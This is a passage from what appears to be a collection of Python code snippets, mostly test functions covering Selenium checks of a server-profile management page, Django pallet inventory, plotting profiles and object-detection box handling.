selenium2lib.capture_page_screenshot()\n return False\n\n logger.info(\"Verifying server hardware type for profile %s\" % profile.name)\n if ui_lib.wait_for_element_visible(FusionServerProfilesPage.ID_PROFILE_HARDWARE, PerfConstants.DEFAULT_SYNC_TIME, fail_if_false=False) is True:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_HARDWARE)\n if txt.find(hardwaretype) == -1:\n logger.info(\"Server hardware of server : %s is not as expected [%s]\" % (txt, hardwaretype))\n selenium2lib.capture_page_screenshot()\n return False\n else:\n logger.warn(\"Failed to wait server hardware type field display\")\n return False\n\n logger.info(\"Verifying enclosure group for profile %s\" % profile.name)\n if ui_lib.wait_for_element_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP, enclosuregroup, PerfConstants.DEFAULT_SYNC_TIME) is False:\n txt = ui_lib.get_text(FusionServerProfilesPage.ID_PROFILE_ENCLOSUREGROUP)\n logger.info(\"Enclosure group of server : %s is not as expected [%s]\" % (txt, enclosuregroup))\n selenium2lib.capture_page_screenshot()\n return False\n\n return True", "def test_add_spawning_profile_to_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n attached = False\n\n for i in intersections:\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n attached = True\n break;\n\n assert attached", "def test_get(self):\r\n profile = self.profile_manager.get('testing')\r\n self.assertIsInstance(profile, Profile)", "def run_tests(): \n \n\n nextdata = [[21, 61, 42, 30], [33,45, 18, 29]]\n\n for xval, yval, snum, expect in nextdata:\n\n pmachine = PMachine()\n pmachine.serial_number = snum\n pmachine.run2_completion()\n result = pmachine.calc_square_total(xval, yval, showsquare=True)\n assert result == expect\n print(\"Got value {}={} as expected\".format(result, expect))", "def test_imdb(net, imdb, anchors):\n output_dir = get_output_dir(imdb, net)\n cache_file = os.path.join(output_dir, 'res_boxes.pkl')\n \n # load cache result boxes (filtered)\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as f:\n proposal_boxes = cPickle.load(f)\n print 'load res boxes from \\'{}\\''.format(cache_file)\n return proposal_boxes\n \n if not os.path.exists(output_dir):\n os.makedirs(output_dir)\n \n print 'Generating proposal boxes by rpn model...'\n proposal_boxes = test_net(net, imdb, anchors)\n print 'Get proposal boxes done!'\n \n print 'Current NMS configuration:'\n print NMS_CONFIG\n\n expand_val = lambda boxes: np.array([boxes[:,0] - boxes[:,2], boxes[:,1] - boxes[:,3],\n boxes[:,2] - boxes[:,0], boxes[:,3] - boxes[:,1],\n np.zeros(boxes.shape[0])]).T * EXPAND_RATIO \n \n # filter boxes\n print 'Filtering proposal boxes...'\n for i in xrange(len(proposal_boxes)):\n proposal_boxes[i] = boxes_filter(proposal_boxes[i], \n PRE_NMS_TOPN=NMS_CONFIG['PRE_NMS_TOPN'], \n NMS_THRESH=NMS_CONFIG['NMS_THRESH'], \n POST_NMS_TOPN=NMS_CONFIG['POST_NMS_TOPN'],\n CONF_THRESH=CONF_THRESH,\n USE_GPU=NMS_CONFIG['USE_GPU'])\n\n # expand bounding box\n if len(proposal_boxes[i]) > 0:\n proposal_boxes[i] = proposal_boxes[i] + expand_val(proposal_boxes[i])\n print 'filter proposal box: {:d}/{:d}'.format(i+1, len(proposal_boxes))\n print 'Filter proposal boxes done!'\n \n # save file\n with open(cache_file, 'wb') as f:\n cPickle.dump(proposal_boxes, f, cPickle.HIGHEST_PROTOCOL)\n print 'save result boxes to `{:s}`'.format(cache_file)\n \n return proposal_boxes", "def test_pallet_finish(self) -> None:\n # set some arbitrary values\n pallet_name = 'Hopefully this never matches !@#$%^&*()_+'\n location_code = '0409C2'\n box_type_code = 'Evans'\n starting_box_number = 98765\n number_of_boxes = 40\n ending_box_number = starting_box_number + number_of_boxes\n product_choices = 'Corn', 'Green Beans'\n exp_year_choices = (now().year + 1), (now().year + 2)\n\n # get corresponding records\n box_type_rec = BoxType.objects.get(box_type_code=box_type_code)\n product1 = Product.objects.get(prod_name=product_choices[0])\n product2 = Product.objects.get(prod_name=product_choices[1])\n product_rec_choices = product1, product2\n\n bm = BoxManagementClass()\n\n # build the pallet\n location_rec = Location.objects.get(loc_code=location_code)\n pallet_rec = Pallet.objects.create(\n name=pallet_name,\n location=location_rec,\n pallet_status=Pallet.FILL,\n )\n pallet_rec_id = pallet_rec.id\n\n # build table of values for later comparison\n pallet_box_info = dict()\n for ndx, box_number in enumerate(\n range(starting_box_number, ending_box_number)):\n ind = ndx % 2\n box_name = BoxNumber.format_box_number(box_number)\n product = product_rec_choices[ind]\n exp_year = exp_year_choices[ind]\n box_rec = bm.box_new(box_number=box_name, box_type=box_type_rec)\n pallet_box_rec = PalletBox.objects.create(\n pallet=pallet_rec,\n box_number=box_name,\n box=box_rec,\n product=product,\n exp_year=exp_year,\n box_status=PalletBox.NEW\n )\n pallet_box_info[box_number] = PalletBoxInfo(\n pallet_box_id=pallet_box_rec.id, box_id=box_rec.id,\n box_number=box_name, product=product, exp_year=exp_year)\n\n # finish (publish) the pallet\n bm.pallet_finish(pallet_rec)\n\n # validate that worked properly\n for entry in pallet_box_info:\n with raises(PalletBox.DoesNotExist):\n _ = PalletBox.objects.get(\n pk=pallet_box_info[entry].pallet_box_id\n )\n box_rec = Box.objects.get(pk=pallet_box_info[entry].box_id)\n assert box_rec.box_number == pallet_box_info[entry].box_number\n assert box_rec.box_type == box_type_rec\n assert box_rec.location == location_rec\n assert box_rec.product == pallet_box_info[entry].product\n assert box_rec.exp_year == pallet_box_info[entry].exp_year\n assert box_rec.exp_month_start == 0\n assert box_rec.exp_month_end == 0\n filled_seconds_ago = (now() - box_rec.date_filled).total_seconds()\n assert filled_seconds_ago < 10\n assert box_rec.quantity == box_type_rec.box_type_qty\n\n with raises(Pallet.DoesNotExist):\n _ = Pallet.objects.get(pk=pallet_rec_id)\n return", "def test_user_profiles(self):\n\n result = self.client.get(\"/profile/1\")\n self.assertIn(b'In house:',result.data)", "def __test_profile(self, bk):\n for arg in self.args['profile']:\n ds = ArgoDataFetcher(backend=bk).profile(*arg).to_xarray()\n assert isinstance(ds, xr.Dataset) == True", "def __call__(self, results):\n\n if 'img_fields' in results:\n assert results['img_fields'] == ['img'], \\\n 'Only single img_fields is allowed'\n img = results['img']\n assert 'bbox_fields' in results\n boxes = [results[key] for key in results['bbox_fields']]\n boxes = np.concatenate(boxes, 0)\n h, w, c = img.shape\n while True:\n mode = random.choice(self.sample_mode)\n self.mode = mode\n if mode == 1:\n return results\n\n min_iou = mode\n for i in range(50):\n new_w = random.uniform(self.min_crop_size * w, w)\n new_h = random.uniform(self.min_crop_size * h, h)\n\n # h / w in [0.5, 2]\n if new_h / new_w < 0.5 or new_h / new_w > 2:\n continue\n\n left = random.uniform(w - new_w)\n top = random.uniform(h - new_h)\n\n patch = np.array(\n (int(left), int(top), int(left + new_w), int(top + new_h)))\n # Line or point crop is not allowed\n if patch[2] == patch[0] or patch[3] == patch[1]:\n continue\n overlaps = bbox_overlaps(\n patch.reshape(-1, 4), boxes.reshape(-1, 4)).reshape(-1)\n if len(overlaps) > 0 and overlaps.min() < min_iou:\n continue\n\n # center of boxes should inside the crop img\n # only adjust boxes and instance masks when the gt is not empty\n if len(overlaps) > 0:\n # adjust boxes\n def is_center_of_bboxes_in_patch(boxes, patch):\n center = (boxes[:, :2] + boxes[:, 2:]) / 2\n mask = ((center[:, 0] > patch[0]) *\n (center[:, 1] > patch[1]) *\n (center[:, 0] < patch[2]) *\n (center[:, 1] < patch[3]))\n return mask\n\n mask = is_center_of_bboxes_in_patch(boxes, patch)\n if not mask.any():\n continue\n for key in results.get('bbox_fields', []):\n boxes = results[key].copy()\n mask = is_center_of_bboxes_in_patch(boxes, patch)\n boxes = boxes[mask]\n if self.bbox_clip_border:\n boxes[:, 2:] = boxes[:, 2:].clip(max=patch[2:])\n boxes[:, :2] = boxes[:, :2].clip(min=patch[:2])\n boxes -= np.tile(patch[:2], 2)\n\n results[key] = boxes\n # labels\n label_key = self.bbox2label.get(key)\n if label_key in results:\n results[label_key] = results[label_key][mask]\n\n # mask fields\n mask_key = self.bbox2mask.get(key)\n if mask_key in results:\n results[mask_key] = results[mask_key][\n mask.nonzero()[0]].crop(patch)\n # adjust the img no matter whether the gt is empty before crop\n img = img[patch[1]:patch[3], patch[0]:patch[2]]\n results['img'] = img\n results['img_shape'] = img.shape\n\n # seg fields\n for key in results.get('seg_fields', []):\n results[key] = results[key][patch[1]:patch[3],\n patch[0]:patch[2]]\n return results", "def test_remove_spawning_profile_from_intersection():\n tester = TestClass()\n intersections = tester.add_spawning_profile_to_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) != 0:\n assert True\n\n for spawn in i.get_spawning_profile_list():\n if spawn.get_spawning_profile_name() == 'Default':\n assert True\n break\n\n tester.delete_spawning_profile_from_intersection()\n\n for i in intersections:\n if len(i.get_spawning_profile_list()) == 0:\n assert True", "def check_pm_elements(*profile_obj):\n profile_elements = ProfileContainer(ProfileContainerType.ADD)\n testResult = True\n logger._log_to_console_and_log_file(\"########### Start a simple check to find all elements.###########\")\n\n selenium2lib = ui_lib.get_s2l()\n if not selenium2lib._is_element_present(FusionServerProfilesPage.ID_PAGE_LABEL):\n navigate()\n\n if isinstance(profile_obj, test_data.DataObj):\n profile_obj = [profile_obj]\n elif isinstance(profile_obj, tuple):\n profile_obj = list(profile_obj[0])\n\n \"\"\" Using checkElementsUItbirdPM to verify if the elements were displayed, if not, mark failure as true \"\"\"\n for profile in profile_obj:\n \"\"\" General profile manager \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LINK_CREATE_SERVER_PROFILES, \" --> ServerProfiles link from Menu \")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_NAME, \" --> Field Name\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_SERVER_PROFILE_DESCRIPTION, \" --> Field description\")\n\n \"\"\" Select hardware \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_DROPDOWN, \" --> Server Hardware Dropdown \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_ELEMENT_NETWORK_NAME_BASE % profile.server, \" --> '\" + profile.server + \"' option in 'Server hardware' dropdown\")\n\n \"\"\" Select server hardware type \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_SERVER_HARDWARE_TYPE_DROPDOWN, \" --> Server Hardware Type Dropdown \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_ELEMENT_NETWORK_NAME_BASE % profile.hardwaretype, \" --> '\" + profile.hardwaretype + \"' option in 'Server hardware type' dropdown\")\n\n \"\"\" Verify Enclosure Group \"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_ENCLOSURE_GROUP_DROPDOWN, \" --> Enclosure Group Dropdown \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_ELEMENT_NETWORK_NAME_BASE % profile.enclgroup, \" --> Select combo enclosure group dropdown: '\" + profile.enclgroup + \"'\")\n\n \"\"\" Selecting the Affinity \"\"\"\n logger._log_to_console_and_log_file(\"########### Selected valid affinity..###########\")\n for item in FusionServerProfilesPage.LIST_NAME_AFFINITY:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_AFFINITY_DROP_DOWN, \" --> Affinity combobox \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_AFFINITY_ITEM % item, \" --> '\" + item + \"' option in 'Affinity' dropdown\")\n\n \"\"\" Firmware Baseline \"\"\"\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_FIRMWARE)\n logger._log_to_console_and_log_file(\"########### Accessing to firmware baseline..###########\")\n\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_FIRMWARE_BASELINE_DROP_DOWN, \" --> Accessing to firmware baseline \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LINK_FIRMWARE_BASELINE_ADD, \" --> Clicking on 'ADD Firmware Baseline' link\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_FIRMWARE_BASELINE_YES_PROCEED, \" --> Looking for 'Yes, proceed' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_FIRMWARE_BASELINE_CANCEL, \" --> Click on 'Cancel' button\")\n\n \"\"\" Add Connections \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to add connections..###########\")\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_CONNECTIONS, \" --> Connections Link on Profile Dropdown Menu\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_ADD_NETWORK_CONNECTION, \" --> Clicking on 'Add Connection' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_CONNECTION_NAME, \" --> Field Name Connection\")\n\n for item in FusionServerProfilesPage.LIST_NAME_FUNCTIONTYPE:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_CONNECTION_FUNCTION_TYPE, \" --> Function type combobox \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_SELECT_BOX_GENERIC_ELEMENT % (item, item), \" --> '\" + item + \"' option in 'Function type' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_INPUT_NETWORK_ADD_CONNECTION, \" --> Field Network\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_ADD_NETWORK_ADD_CONNECTON, \" --> Looking for 'Add' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_ADD_NETWORK_ADD_PLUS_CONNECTON, \" --> Looking for 'Add+' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_CANCEL_ADD_CONNECTION, \" --> Clicking on 'Cancel' button\")\n\n \"\"\" Local storage volumes \"\"\"\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_LOCAL_STORAGE)\n logger._log_to_console_and_log_file(\"########### Accessing to Local Storage volumes..###########\")\n selenium2lib.select_checkbox(FusionServerProfilesPage.ID_CHKBOX_LOCAL_STORAGE)\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_LOCAL_STORAGE, \" --> Clicking a checbox of Manage Local Storage\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_MANAGE_INTEGRATED_CONTROLLER, \" --> Clicking a checkbox of manage integrated controller\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_MANAGE_STORAGE_CONTROLLER_CLOSE, \" --> Clicking on 'Close' button\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_unselect, FusionServerProfilesPage.ID_EDIT_INITIALIZE_LOCAL_STORAGE, \" --> Uncheckbox re-initialize internal storage on next application of server profile\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_IMPORT_EXISTING, \" --> Checkbox import exsisting logical drives\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_unselect, FusionServerProfilesPage.ID_CHKBOX_IMPORT_EXISTING, \" --> Uncheckbox import exsisting logical drives\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_EDIT_INITIALIZE_LOCAL_STORAGE, \" --> Checkbox re-initialize internal storage on next application of server profile\")\n\n for item in FusionServerProfilesPage.LIST_NAME_CONTROLLER_MODE:\n if __select_value_from_a_profile_combo_box(FusionServerProfilesPage.ID_COMBO_CONTROLLER_MODE, FusionServerProfilesPage.ID_COMBO_DEFAULT_ITEM % item):\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_CHKBOX_CONTROLLER_MODE, \" --> '\" + item + \"' option in 'Controller mode' dropdown\")\n else:\n logger._log_to_console_and_log_file(\" --> Failed to select item %s in controller mode for local storage\" % item)\n testResult &= False\n\n \"\"\" Create Logical Drive \"\"\"\n logger._log_to_console_and_log_file(\"########### Create Logical Drive..###########\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_CREATE_LOGICAL_DRIVE, \" --> Select button create logical drive\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_NAME_ADD_LOGICAL_DRIVE, \" --> Show a field name in logical drive\")\n for item in FusionServerProfilesPage.LIST_NAME_RAID_LEVEL:\n if __select_value_from_a_profile_combo_box(FusionServerProfilesPage.ID_COMBO_RAID_LEVEL, FusionServerProfilesPage.ID_COMBO_DEFAULT_ITEM_RAID % item):\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_ADD_LOGICAL_RAID_LEVEL, \" --> '\" + item + \"' option 'RAID level' dropdown\")\n else:\n logger._log_to_console_and_log_file(\" --> Failed to select item %s in logical drive combobox\" % item)\n testResult &= False\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LISTBOX_NUMBER_PHYSICAL_DRIVES, \" --> Show a number of physical drives\")\n for item in FusionServerProfilesPage.LIST_NAME_DRIVE_TECHNOLOGY:\n if __select_value_from_a_profile_combo_box(FusionServerProfilesPage.ID_NAME_DRIVE_TECHNOLOGY, FusionServerProfilesPage.ID_COMBO_DEFAULT_ITEM_DRIVE % item):\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_DRIVE_TECHNOLOGY, \" --> '\" + item + \"' option 'Drive technology' dropdown\")\n else:\n logger._log_to_console_and_log_file(\" --> Failed to select item %s in logical drive type combobox\" % item)\n testResult &= False\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_LOGICAL_DRIVE_FORM, \" --> Looking for 'Create' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_PLUS_LOGICAL_DRIVE, \" --> Looking for 'Create +' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_ADD_LOGICAL_DRIVE_CANCEL, \" --> Clicking on 'Cancel' button of screen add logical drive\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_COMBO_BOOT_DRIVE_LOCAL_STORAGE, \" --> Select combo boot drive\")\n\n \"\"\" SAN Storage \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to SAN storage..###########\")\n testResult &= ui_lib.wait_for_element_and_click(profile_elements.ID_COMBO_MENU_VIEW)\n testResult &= ui_lib.wait_for_element_and_click(FusionServerProfilesPage.ID_LINK_SANSTORAGE, \" --> San Storage Link on Profile Dropdown Menu\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_select, FusionServerProfilesPage.ID_CHKBOX_SAN_STORAGE, \" --> Check manage san storage\")\n\n for item in FusionServerProfilesPage.LIST_NAME_HOST_OS_TYPE:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_OS_TYPE_DROP_DOWN, \" --> Combobox Host OS type\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_OS_TYPE_SELECT % item, \" --> '\" + item + \"' option 'Host OS type' dropdown\")\n\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_ADD_STORAGE, \" --> Clicking on 'Add Volume' button\")\n logger._log_to_console_and_log_file(\" --> Select Existing volume \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_VOLUME_TYPE, \" --> Combobox type\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.GET_TEXT_FROM_SPAN % VolumeTypes.EXISTING_VOLUME, \" --> '\" + VolumeTypes.EXISTING_VOLUME + \"' option 'Type' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_VOLUME_NAME_SEARCH, \" --> Search name of volume \")\n\n logger._log_to_console_and_log_file(\" --> Select New volume \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_VOLUME_TYPE, \" --> Combobox type\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.GET_TEXT_FROM_SPAN % VolumeTypes.NEW_VOLUME, \" --> '\" + VolumeTypes.NEW_VOLUME + \"' option 'Type' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_NEW_VOLUME_NAME, \" --> New volume name\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_NEW_VOLUME_DESCRIPTION, \" --> Description\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LUN_MANUAL, \" --> Check Manual on radiobox\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_LUN_VALUE, \" --> Specify a number between 0 and 16383\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_STORAGE_POOL_DROPDOWN, \" --> Search a storage pool \")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_CAPACITY_BOX, \" --> The capacity GiB\")\n\n for item in FusionServerProfilesPage.LIST_NAME_PROVISIONING:\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_PROVISIONING_DROPDOWN, \" --> Combobox provisioning\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_SELECT_PROVISIONING % item, \" --> '\" + item + \"' option 'Provisioning' dropdown\")\n testResult &= correctly_executed(ui_lib.wait_for_checkbox_and_unselect, FusionServerProfilesPage.ID_CHK_PERMANENT, \" --> Uncheck permanent\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_STORAGE_ADD, \" --> Looking for 'Add' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_STORAGE_ADD_PLUS, \" --> Looking for 'Add+' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_CANCEL_BTN, \" --> Click on 'Cancel' button\")\n\n \"\"\" Setting boot order \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to Boot Settings..###########\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, profile_elements.ID_COMBO_MENU_VIEW, \" --> Create Profile Dropdown Menu \")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_LINK_BOOTSETTINGS, \" --> Boot Settings Link on Profile Dropdown Menu\")\n\n if __fill_boot_settings_fields(profile, profile_elements):\n logger._log_to_console_and_log_file(\" --> Fill boot settings executed correctly\")\n else:\n testResult = False\n logger._log_to_console_and_log_file(\" --> Fill boot settings NOT executed correctly\")\n\n \"\"\" Select Advanced Options \"\"\"\n logger._log_to_console_and_log_file(\"########### Accessing to Advanced options..###########\")\n logger._log_to_console_and_log_file(\" --> Radio each in Advanced Options\")\n logger._log_to_console_and_log_file(\" --> Clicking each radio in Advanced Options\")\n\n if __select_advanced_options(profile, profile_elements):\n logger._log_to_console_and_log_file(\" --> Select advanced options elements were correctly displayed\")\n else:\n testResult = False\n logger._log_to_console_and_log_file(\" --> Select advanced options elements were NOT correctly displayed\")\n\n \"\"\" Click on button Cancel Server Profile\"\"\"\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_SERVER_PROFILE, \" --> Looking for 'Create' button\")\n testResult &= correctly_executed(ui_lib.wait_for_element_visible, FusionServerProfilesPage.ID_BTN_CREATE_PLUS_SERVER_PROFILE, \" --> Looking for 'Create +' button\")\n logger._log_to_console_and_log_file(\"########### Click on button Cancel Server Profile..###########\")\n testResult &= correctly_executed(ui_lib.wait_for_element_and_click, FusionServerProfilesPage.ID_BTN_CANCEL_SERVER_PROFILE, \" --> Clicking on 'Cancel' button of server profile\")\n if testResult is True:\n logger._log_to_console_and_log_file(\"- All the elements were found\")\n else:\n logger._log_to_console_and_log_file(\"When test fails, console logging is not filled\")\n ui_lib.fail_test(\"- At least one element was not found. Please check the 'Overview' page\")", "def gain_box_score(im, preds):\n if len(preds[0]) == 0:\n cv2.imshow(\"Video detection\", im)\n else:\n for pred in preds:\n for i, box_label in enumerate(zip( pred[\"boxes\"], pred[\"labels\"] )):\n box, label = box_label\n xmin, ymin, xmax, ymax = box\n#-------------------- Create a Rectangle patch ----------------------- \n if label==1:\n class_name='with_mask'\n color = (0, 255, 0)\n elif label==2:\n class_name='without_mask'\n color = (0, 0, 255)\n elif label==3:\n class_name='mask_worn_improperly'\n color = (255, 255 ,0)\n score = pred['scores'][i]\n#--------------------- Bounding Box painting -------------------------- \n if score > 0.65:\n cv2.rectangle(im, (xmin, ymin), (xmax, ymax), color, 1) \n cv2.putText(im, str(class_name)+str(round(score.item(),2)), (xmin,int(ymax-ymax/20)),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,255), 1) #print class name\n cv2.imshow(\"Video detection\",im)\n print('*****', 'Bbox:', i , '*****' )\n print('Class: ', str(class_name))\n print('Scores: ', str(round(score.item(),2)))\n print('boxes: ',f'{int(xmin)}, {int(ymin)}, {int(xmax)}, {int(ymax)}')\n print('image shape: ', im.shape) \n else:\n cv2.imshow(\"Video detection\", im)\n print('********************','\\n')", "def test_next(self, display_detections=False):\n batch = next(self.data_iterator)\n sample_index, image_size, image_resize_ratio, images, rois = batch\n sample_index = sample_index.cpu().numpy()[0]\n image_resize_ratio = image_resize_ratio.cpu().numpy()[0]\n rois = rois[0]\n image_size = image_size.cpu().numpy()[0]\n\n all_boxes = self.test_single(images, rois, image_size,\n image_resize_ratio)\n\n if display_detections:\n display_boxes, display_classes = self.get_display_boxes(all_boxes)\n sample = self.data_loader.dataset.samples[sample_index]\n if len(display_boxes) > 0:\n self.display_detections(\n display_boxes,\n display_classes,\n sample)\n\n return all_boxes", "def testMethodProfile2D(self):\n\n toolBar = self.plot.getProfileToolbar()\n\n toolBar.vLineAction.trigger()\n plot2D = self.plot.getPlotWidget().getWidgetHandle()\n pos1 = plot2D.width() * 0.5, plot2D.height() * 0.5\n self.mouseClick(plot2D, qt.Qt.LeftButton, pos=pos1)\n\n manager = toolBar.getProfileManager()\n roi = manager.getCurrentRoi()\n roi.setProfileMethod(\"mean\")\n roi.setProfileType(\"2D\")\n roi.setProfileLineWidth(3)\n\n for _ in range(20):\n self.qWait(200)\n if not manager.hasPendingOperations():\n break\n\n # check 2D 'mean' profile\n profilePlot = roi.getProfileWindow().getCurrentPlotWidget()\n data = profilePlot.getAllImages()[0].getData()\n expected = numpy.array([[1, 4], [7, 10], [13, 16]])\n numpy.testing.assert_almost_equal(data, expected)", "def test_resultingGoose_inside(self):\n goose = coordinate.Coordinate(4, 2)\n actual_result = rules.resultingGoose(types.GOOSE, goose)\n expected_result = types.SUPERGOOSE\n self.assertEqual(actual_result, expected_result)", "def verifyViewProfile(self):\n self.waitForElement(locator=self._viewProfileImg, locatorType=\"xpath\")\n result = self.isElementPresent(locator=self._viewProfileImg, locatorType=\"xpath\")\n self.log.info(\"Verify View Profile result: \" + str(result))\n return result", "def test_positive_electrode_potential_profile(self):\n\n # TODO: add these when have averages", "def inner_test(param: models.Game):\n self.assertEqual(param, game)", "def test_creation_profile_5():\n assert tuple_NT[0][4] == LIST_dict[0]['current_location'], \"current_location' of profile is not getting stored properly\"", "def test_profiles(\n self, profile_name: str, pytestconfig: object, monkeypatch: object, options: object\n ) -> None: # pylint: disable=unused-argument\n\n # initialize profile\n valid, message = self.init_profile(\n profile_name, pytestconfig=pytestconfig, monkeypatch=monkeypatch, options=options\n )\n assert valid, message\n\n # run custom test method before run method\n self.custom.test_pre_run(\n self, self.profile.data, monkeypatch if self.run_method == 'inline' else None\n )\n\n assert self.run_profile() in self.profile.exit_codes\n\n # run custom test method before validation\n self.custom.test_pre_validate(self, self.profile.data)\n\n # get Validation instance\n validation = ValidateFeature(self.validator)\n\n # validate App outputs and Profile outputs are consistent\n validation.validate_outputs(self.profile.tc_playbook_out_variables, self.profile.outputs)\n\n # validate App outputs with Profile outputs\n validation.validate(self.profile.outputs)\n\n # validate exit message\n exit_message_data = self.profile.exit_message\n if exit_message_data:\n self.validate_exit_message(\n exit_message_data.pop('expected_output'),\n exit_message_data.pop('op'),\n **exit_message_data\n )", "def test_add_spawning_profile():\n center = Coordinates(1 , 1)\n radius = 10\n speed_limit = 20\n\n i = 